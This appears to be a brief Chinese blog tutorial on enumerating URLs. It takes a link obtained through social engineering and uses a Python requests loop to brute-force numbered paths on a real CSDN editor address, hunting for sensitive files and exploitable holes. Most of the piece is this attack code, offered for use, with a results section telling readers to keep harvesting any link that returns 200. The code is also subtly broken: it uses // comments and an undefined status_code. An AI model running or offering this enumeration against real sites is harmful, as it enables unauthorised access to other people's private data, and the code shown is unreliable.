一、功能描述
通过社会工程方法获取敏感信息链接后,利用python代码对链接进行爆破,从而获取其他敏感信息及可利用漏洞。
二、工具介绍
Python 内置了 requests 模块,该模块主要用来发 送 HTTP 请求。每次调用 requests 请求之后,会返回一个 response 对象,该对象包含了具体的响应信息。
参数:
三、核心代码实现
for index in range(0, 2000): //for index in [匹配规则],以编码规则为例
index = "{:04d}".format(index) //匹配编码位数(4位为例)
//[协议]://[域名].[路径].[文件名],以编号为例,可遍历该目录路径下所有编号的文件
url = "https://mp.csdn.net/mp_blog/creation/editor/129851592"
//替换字节(本文只部分替换,遍历2000次,可根据实际链接思考爆破方法)
url = "https://mp.csdn.net/mp_blog/creation/editor/12985{}".format(index)
data = requests.get(url) //向url发送get请求
data = status_code //查看url响应码
print(url, data) //输出链接和响应码
四、运行结果
响应码信息为200,爆破成功。该链接可以访问,继续对该链接进行访问以获取更多的敏感信息。
五、参考链接
requests函数 Python requests 模块 | 菜鸟教程